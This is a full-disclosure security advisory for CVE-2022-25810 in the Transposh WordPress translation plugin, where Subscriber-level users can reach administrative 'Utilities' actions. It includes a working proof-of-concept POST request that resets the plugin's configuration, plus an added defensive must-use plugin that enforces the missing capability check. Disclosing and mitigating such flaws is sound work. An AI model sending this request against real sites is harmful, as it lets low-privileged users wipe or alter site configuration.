
List:       full-disclosure
Subject:    [FD] [CVE-2022-25810] Transposh <= 1.0.8.1 Improper Authorization Allowing Access to Administrative 
From:       "Julien Ahrens (RCE Security)" <info () rcesecurity ! com>
Date:       2022-07-22 14:49:29
Message-ID: BB22D6A9-0C25-40B5-B895-A0B67518BF73 () rcesecurity ! com

RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        Transposh WordPress Translation
Vendor URL:     https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/
Type:           Improper Authorization [CWE-285]
Date found:     2022-02-21
Date published: 2022-07-22
CVSSv3 Score:   6.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)
CVE:            CVE-2022-25810


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
Transposh WordPress Translation 1.0.8.1 and below


4. INTRODUCTION
===============
Transposh translation filter for WordPress offers a unique approach to blog
translation. It allows your blog to combine automatic translation with human
translation aided by your users with an easy to use in-context interface.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
Transposh does not properly enforce authorization on functionality available on
the plugin's "Utilities" page, leading to unauthorized access for all user roles,
including "Subscriber".

Some of the affected functionality is:
tp_backup - Initiate a new backup
tp_reset - Reset the plugin's configuration
tp_cleanup - Delete automated translations
tp_dedup - Delete duplicates
tp_maint - Fix internal errors
tp_translate_all - Trigger an auto-translation of all entries


6. PROOF OF CONCEPT
===================
As an example, to reset the plugin's configuration, send the following
request using a "Subscriber" account:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 15
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your cookies]
Connection: close

action=tp_reset


7. SOLUTION
===========
None. Remove the plugin to prevent exploitation.
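
Added example (not part of the original advisory and not Transposh code): a
must-use plugin that puts the capability check missing from the actions listed
in section 5 in front of them. It assumes the plugin registers those actions on
WordPress' standard wp_ajax_{action} hooks and that "manage_options" is the
right capability for the "Utilities" page; the file and function names are
hypothetical.

```php
<?php
/**
 * Added example (not Transposh or advisory code): must-use plugin that adds
 * the capability check missing from the "Utilities" AJAX actions.
 * Save as wp-content/mu-plugins/tp-ajax-guard.php (hypothetical file name).
 *
 * Assumption: Transposh registers these actions on the standard
 * wp_ajax_{action} hooks, as the admin-ajax.php request in section 6 suggests.
 */

// Actions named in the advisory; it says "some of", so the list may be incomplete.
const TP_GUARDED_ACTIONS = array(
    'tp_backup', 'tp_reset', 'tp_cleanup',
    'tp_dedup', 'tp_maint', 'tp_translate_all',
);

/**
 * Stop the request unless the logged-in user is an administrator.
 */
function tp_guard_require_admin() {
    if ( current_user_can( 'manage_options' ) ) {
        return; // Administrators fall through to the plugin's own handler.
    }
    $action = isset( $_REQUEST['action'] )
        ? sanitize_key( wp_unslash( $_REQUEST['action'] ) )
        : '';
    // Leave a trace for detection: who tried which action, from where.
    error_log( sprintf(
        'tp-ajax-guard: denied action=%s user_id=%d ip=%s',
        $action,
        get_current_user_id(),
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '-'
    ) );
    // wp_send_json_error() sends the response and ends the request,
    // so a handler registered at a later priority never runs.
    wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
}

foreach ( TP_GUARDED_ACTIONS as $tp_action ) {
    // PHP_INT_MIN: run before any handler registered at a normal priority.
    add_action( 'wp_ajax_' . $tp_action, 'tp_guard_require_admin', PHP_INT_MIN );
    // Unauthenticated variant, in case a nopriv handler is registered too
    // (assumption; the advisory only demonstrates the logged-in path).
    add_action( 'wp_ajax_nopriv_' . $tp_action, 'tp_guard_require_admin', PHP_INT_MIN );
}
```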


8. REPORT TIMELINE
==================
2022-02-21: Discovery of the vulnerability
2022-02-21: Contacted the vendor via email
2022-02-21: Vendor response
2022-02-22: CVE requested from WPScan (CNA)
2022-02-23: WPScan assigns CVE-2022-25810
2022-05-22: Sent request for status update on the fix
2022-05-24: Vendor states that there is no update planned so far
2022-07-22: Public disclosure


9. REFERENCES
=============
https://github.com/MrTuxracer/advisories
